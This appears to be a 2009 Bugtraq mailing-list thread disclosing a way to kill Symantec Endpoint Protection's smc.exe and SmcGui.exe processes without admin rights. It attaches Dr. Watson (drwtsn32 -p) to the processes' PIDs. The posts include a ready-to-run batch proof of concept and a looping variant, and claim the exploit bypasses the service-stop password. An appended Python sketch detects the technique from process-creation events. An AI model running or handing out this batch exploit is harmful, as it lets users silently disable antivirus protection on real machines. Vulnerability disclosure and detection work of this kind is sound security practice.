Re: SEPKILL /im SMC.EXE /f



For the "Users" it's working for SmcGui.exe.

Please find the code as below.

:here
tasklist | find /i "SmcGui.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%
goto :here

I have tried it, and when I let this file run for around 2 mins, the SmcGui.exe process loads up when you log off and log back in (or restart), but the icon does not show up in the taskbar.

Thank you.

Regards, Sandeep

--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@xxxxxxx>
Sent: Friday, February 13, 2009 7:03 PM
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: Re: SEPKILL /im SMC.EXE /f

As an update, it's not happening for the "Users" account, though there is no access denied.

Does anyone know why?

Thank you.

Regards, Sandeep

--------------------------------------------------
From: "Sandeep Cheema" <51l3n7@xxxxxxx>
Sent: Friday, February 13, 2009 6:18 PM
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: SEPKILL /im SMC.EXE /f

Hi,

Probably this bug exists in majorly all software, but security software like antivirus and firewall have to bucket it, which is not what it is for SEP.
I have tested it on all versions of SEP from 11.0.776 to 11.0.4000 (XP and 2k3).


You can kill smc.exe with the help of drwtsn32.exe in the following way.

drwtsn32 -p %pid%
where pid is the process id for smc.exe

POC:

Save the following as a batch file and execute it

tasklist | find /i "Smc.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%



You don't need admin privilege for this exploit.

This will even bypass the password if it has been set to stop the service.
If executed from the command line in the form drwtsn32 -p %pid%, the command will be executed and it takes some time for the process to be stopped.
If done from a batch file the command is completed only when the process is stopped.

Regards, Sandeep
51l3n7[at]live.in
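
Added example, not part of the original posts: a detection sketch that flags drwtsn32 being started with -p against a PID belonging to Smc.exe or SmcGui.exe, by correlating process-creation events. The event tuple layout, the sample events and the C:\constructed paths are assumptions made for illustration.

```python
import re

# Process names come from the thread; the event layout is an assumption
# modelled on generic process-creation logging, not a product schema.
PROTECTED = {"smc.exe", "smcgui.exe"}
PID_ARG = re.compile(r"(?:^|\s)-p\s+(\d+)\b", re.IGNORECASE)

# Constructed sample events (not real logs), in time order:
# (time, pid, user, image path, command line)
EVENTS = [
    ("10:00:01", 1200, "SYSTEM", r"C:\constructed\Smc.exe", "Smc.exe"),
    ("10:00:05", 2312, "alice", r"C:\constructed\SmcGui.exe", "SmcGui.exe"),
    ("10:02:00", 3000, "alice", r"C:\constructed\notepad.exe", "notepad.exe"),
    # Debugger attached to an unrelated process: must not alert.
    ("10:03:10", 3104, "alice", r"C:\WINDOWS\system32\drwtsn32.exe", "drwtsn32 -p 3000"),
    # Debugger attached to the protected service and to its GUI: must alert.
    ("10:04:00", 3208, "alice", r"C:\WINDOWS\system32\drwtsn32.exe", "drwtsn32 -p 1200"),
    ("10:04:02", 3212, "alice", r"C:\WINDOWS\system32\DRWTSN32.EXE", "DRWTSN32.EXE  -P 2312"),
    # PID 2312 is reused by another program, so a later attach is not a hit.
    ("10:05:00", 2312, "alice", r"C:\constructed\calc.exe", "calc.exe"),
    ("10:05:30", 3300, "alice", r"C:\WINDOWS\system32\drwtsn32.exe", "drwtsn32 -p 2312"),
]


def image_name(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (time, user, target name, target pid) for each drwtsn32 -p
    invocation whose target PID currently maps to a protected process."""
    live = {}    # pid -> image name of the latest process created with it
    alerts = []
    for time, pid, user, image, cmdline in events:
        name = image_name(image)
        live[pid] = name    # a reused PID now refers to the new process
        match = PID_ARG.search(cmdline)
        if name == "drwtsn32.exe" and match:
            target_pid = int(match.group(1))
            if live.get(target_pid) in PROTECTED:
                alerts.append((time, user, live[target_pid], target_pid))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print("ALERT", alert)
```

A target PID whose creation event was never logged is not matched, so the check needs process-creation logging that covers the protected processes from their start.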





